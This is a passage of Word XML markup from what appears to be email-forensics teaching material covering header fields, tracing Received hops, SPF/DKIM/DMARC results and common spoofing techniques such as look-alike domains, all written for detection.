        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — information used by servers to deliver the message (MAIL FROM / RCPT TO); not shown in the mail client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a long list of fields added by the sender’s program and by each server on the route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Body and attachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the text, HTML and files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An email is stored in formats such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.eml/.msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a single message), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.mbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and Outlook’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.pst/.ost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files. To see the full header, use “View original / Show source” in the mail program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Important header fields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42"/>
        <w:gridCol w:w="3606"/>
        <w:gridCol w:w="3898"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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360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Forensic note</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From</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Displayed sender name and address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Easily forged — never trust it alone</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Return-Path</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Address where bounces are sent (envelope sender)</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Often different from From in spoofed mail</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Reply-To</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Where replies will go</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Attackers set it to their own address</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Received</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One line added by each mail server that handled the email, with server name, IP and time</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">most reliable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> part; read </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">from the bottom (first server) to the top (last server)</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Message-ID</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Unique ID created by the sending system</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domain in it that differs from the sender’s domain is suspicious</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X-Originating-IP / X-Mailer</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IP address of the sender’s device or the mail program used</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May reveal the true origin (not always present)</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Authentication-Results</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Results of SPF, DKIM and DMARC checks done by the receiver</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pass/fail</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Date</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Time sent, with time zone</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Compare with Received times; mismatches may indicate forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tracing the source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the original email in its raw form (.eml) and hash it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">List all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Received</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bottom-most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> one was added first, closest to the sender.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note each server’s name, IP address and time. Check that the times increase logically from bottom to top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">first external IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the earliest server that is not the sender’s own internal network).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look up that IP with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS / geolocation / reverse DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the owner and country.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check whether the IP belongs to a legitimate mail server for the claimed domain, or to a hosting provider, VPN or anonymiser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Draw a hop-path diagram and record your findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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 Example hop path (read bottom to top)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sender PC (203.0.113.45)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   -&gt; smtp.freehost.example (198.51.100.20)       &lt;- first Received header</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   -&gt; mx-relay.example.net (192.0.2.10)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   -&gt; mail.victim-company.com (recipient server)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   -&gt; Recipient mailbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SPF, DKIM and DMARC</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4483"/>
        <w:gridCol w:w="3119"/>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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="448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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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proves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SPF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Sender Policy Framework)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="448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domain publishes, in DNS, a TXT record listing which servers may send mail for it. The receiver checks the sending IP against the list of the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">envelope-from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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That the sending </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> is authorised for the domain</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DKIM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (DomainKeys Identified Mail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="448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sending server signs parts of the message with a private key; the public key is in DNS. The receiver verifies the signature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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That the message came from the domain and was </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">not modified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in transit</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DMARC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="448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domain publishes a policy telling receivers what to do (none / quarantine / reject) when SPF or DKIM fail </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">or do not align with the From domain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, and where to send reports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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Ties the checks to the visible </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">From</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> address; protects against spoofing</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SPF result</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pass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Sending IP is authorised</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fail</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-all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Sending IP is NOT authorised — a strong sign of spoofing</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softfail</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~all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Probably not authorised, but the domain owner has asked receivers to treat it as suspicious rather than reject it outright</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neutral / none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definite statement / no SPF record</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Is softfail enough to block an email?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No, not by itself.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Softfail is a warning, not a verdict. Legitimate mail can softfail (forwarding, mailing lists). The decision should combine SPF, DKIM, DMARC alignment, the Received path, the reputation of the sending IP, the content (links, attachments) and the domain’s age and look-alike characteristics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Spoofing techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forged From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the From address is simply typed in by the attacker’s mail program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Display-name spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — shows “CEO Name” but the actual address is a personal Gmail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look-alike domains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">paypa1.com</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micros0ft-support.com</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company-india.co</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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised real account</w:t>
